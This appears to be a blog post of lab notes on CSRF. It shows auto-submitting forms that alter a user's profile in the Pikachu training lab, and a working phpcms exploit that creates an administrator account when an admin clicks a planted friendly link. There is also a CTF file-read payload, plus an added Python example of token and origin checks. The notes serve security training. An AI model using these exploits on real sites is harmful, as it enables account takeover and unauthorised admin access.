CSRF

CSRF (GET)

caichuanqi site

Pikachu menu: CSRF > CSRF(get) > modify information

Copy the request URL and paste it into the short-link generator at https://tool.chinaz.com/tools/dwz.aspx

CSRF (POST)

Create a new HTML file under D:\phpStudy\PHPTutorial\WWW\pikachu\pikachu\vul\csrf\csrfpost

Contents:

<html>
<head>
<script>
// As soon as the page loads, click the submit button: the victim's browser
// sends the POST with the victim's own session cookie attached.
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<!-- Same field names as the real profile-edit form; the endpoint has no anti-CSRF token -->
<form method="post" action="http://127.0.0.1/pikachu/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
  <input id="sex" type="text" name="sex" value="girl" />
  <input id="phonenum" type="text" name="phonenum" value="123456789" />
  <input id="add" type="text" name="add" value="hubei" />
  <input id="email" type="text" name="email" value="lucy@163.com" />
  <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

Visit http://127.0.0.1/Pikachu/Pikachu/vul/csrf/csrfpost/1.html
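Why the auto-submitting form above succeeds, and what stops it, as an added example that is not part of these notes or of Pikachu: csrf_post_edit.php accepts the POST on the strength of the session cookie alone. The hypothetical handler below adds the two checks it lacks, a session-bound synchronizer token and an Origin/Referer check; the secret, session id and function names are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values for this example (a real deployment keeps the secret out of source).
SERVER_SECRET = b"constructed-example-secret"
SITE_SCHEME, SITE_HOST = "http", "127.0.0.1"
PROFILE_FIELDS = ("sex", "phonenum", "add", "email")


def csrf_token(session_id: str) -> str:
    """Per-session token the real edit page embeds as a hidden field.
    A page on another origin cannot read it, so it cannot forge a valid POST."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Reject when Origin (or, failing that, Referer) is absent or not our scheme+host."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return (parts.scheme, parts.netloc) == (SITE_SCHEME, SITE_HOST)


def handle_profile_edit(session_id: str, form: dict, headers: dict) -> tuple:
    """Hardened stand-in for csrf_post_edit.php: returns (status, message)."""
    if not same_origin(headers):
        return 403, "cross-site request rejected"
    # Note: in the lab the forged page sits on the same host, so the origin check
    # alone would not catch it; the token comparison is the check that matters.
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, csrf_token(session_id)):
        return 403, "missing or invalid csrf token"
    updated = {k: form[k] for k in PROFILE_FIELDS if k in form}
    return 200, "updated: " + ",".join(sorted(updated))


def demo() -> tuple:
    """Forged request (fields from the notes, no token) vs. the legitimate one."""
    sid = secrets.token_hex(8)  # victim's session id, constructed
    forged = {"sex": "girl", "phonenum": "123456789", "add": "hubei", "email": "lucy@163.com"}
    forged_status, _ = handle_profile_edit(sid, forged, {"Origin": "http://attacker.example"})
    legit = dict(forged, csrf_token=csrf_token(sid))
    legit_status, _ = handle_profile_edit(sid, legit, {"Origin": "http://127.0.0.1"})
    return forged_status, legit_status  # (403, 200)
```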


http://51eb0391-61a0-4ca4-aa65-47c9c41e0b78.challenge.ctf.show/

url=file:var/html/www/flag.php

select module: filtered injection

phpcms

Install (fresh install), then log in as administrator.

Settings > Administrator management > Add; capture the request through the proxy with username hhh. It succeeds, so the vulnerability is present.

Create a new file 1.php under D:\phpStudy\PHPTutorial\WWW\phpcms\install_package

<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8">
  <title>phpcms csrf 加管理</title>
  <script type="text/javascript">
  // Minimal form-builder helper (gum, by quininer); see the 'author' URL below.
  gum = function(){
    var u = {
      'version':'1140213',
      'domain':'{{domain}}',
      'backinfo':{},
      'author': 'https://github.com/quininer/gum'
    };
    u.e = function(code){try{return eval(code)}catch(e){return ''}};
    u.name = function(names){
      return document.getElementsByTagName(names);
    };
    // Return the <html> element, writing one if the document has none yet.
    u.html = function(){
      return u.name('html')[0]
          ||document.write('<html>')
          ||u.name('html')[0];
    };
    // Parse an HTML snippet, optionally hide it, and append it to doming.
    u.addom = function(html, doming, hide){
      (!doming)&&(doming = u.html());
      var temp = document.createElement('span');
      temp.innerHTML = html;
      var doms = temp.children[0];
      (hide)&&(doms.style.display = 'none');
      doming.appendChild(doms);
      return doms;
    };
    // Build a hidden POST form with one input per key in data and submit it.
    u.post = function(url, data){
      var form = u.addom("<form method='POST'>", u.html(), true);
      form.action = url;
      for(var name in data){
        var input = document.createElement('input');
        input.name = name;
        input.value = data[name];
        form.appendChild(input);
      }
      form.submit();
    };
    return u;
  }();
  // Unique username per run so repeated visits do not collide on an existing account.
  var timestamp = (Date.parse(new Date())) / 1000;
  // pc_hash is filled in server-side by PHP from the query string of the link the admin clicked.
  gum.post('http://127.0.0.1/phpcms/install_package/index.php?m=admin&c=admin_manage&a=add', {
    'info[username]': 'test_' + timestamp,
    'info[password]': '123123',
    'info[pwdconfirm]': '123123',
    'info[email]': '123@qq.com',
    'info[realname]': '',
    'info[roleid]': '1',
    'dosubmit': '提交',
    'pc_hash': '<?php echo $_GET['pc_hash']; ?>'
  });
  </script>
 </head>
 <body>
 </body>
</html>

Create the new user: in 1.php the target URL is set to http://127.0.0.1/phpcms/install_package/index.php?m=admin&c=admin_manage&a=add

Visit the homepage http://127.0.0.1/phpcms/install_package/index.php

Apply for a friendly link, giving http://127.0.0.1/phpcms/install_package/1.php as the address

Clicking the link in the friendly-links module triggers the request

The administrator account is added successfully


posted @ 2022-03-10 20:37 by 檐下月